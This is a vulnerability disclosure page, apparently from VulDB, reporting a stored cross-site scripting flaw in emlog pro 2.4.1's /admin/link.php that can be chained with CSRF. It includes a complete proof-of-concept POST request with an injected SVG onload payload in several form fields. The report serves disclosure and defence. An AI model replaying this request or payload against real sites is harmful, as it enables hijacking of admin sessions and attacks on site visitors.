Submit #462614: emlog emlog pro 2.4.1 Cross-Site Scripting (XSS)info

Titleemlog emlog pro 2.4.1 Cross-Site Scripting (XSS)
DescriptionSummary A stored XSS vulnerability exists in emlog pro 2.4.1 which allows attackers to execute arbitrary HTML code. Details Because /admin/link.php has CSRF problems, attackers can use XSS to cooperate with CSRF to attack. The siteurl and icon parameters have XSS vulnerabilities. image POC POST /admin/link.php?action=save HTTP/1.1 Host: target-ip Content-Length: 297 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [admins'cookie] Connection: keep-alive sitename=https%3A%2F%2Fwww.com%2F%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&siteurl=https%3A%2F%2Fwww.com%2F%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&icon=https%3A%2F%2Fwww.com%2F%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&description=https%3A%2F%2Fwww.com%2F%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&linkid=
Source⚠️ https://github.com/emlog/emlog/issues/307
User
 jiashenghe (UID 39445)
Submission12/13/2024 08:09 (2 years ago)
Moderation12/20/2024 13:36 (7 days later)
StatusAccepted
VulDB entry289082 [Emlog Pro up to 2.4.1 /admin/link.php siteurl/icon cross site scripting]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!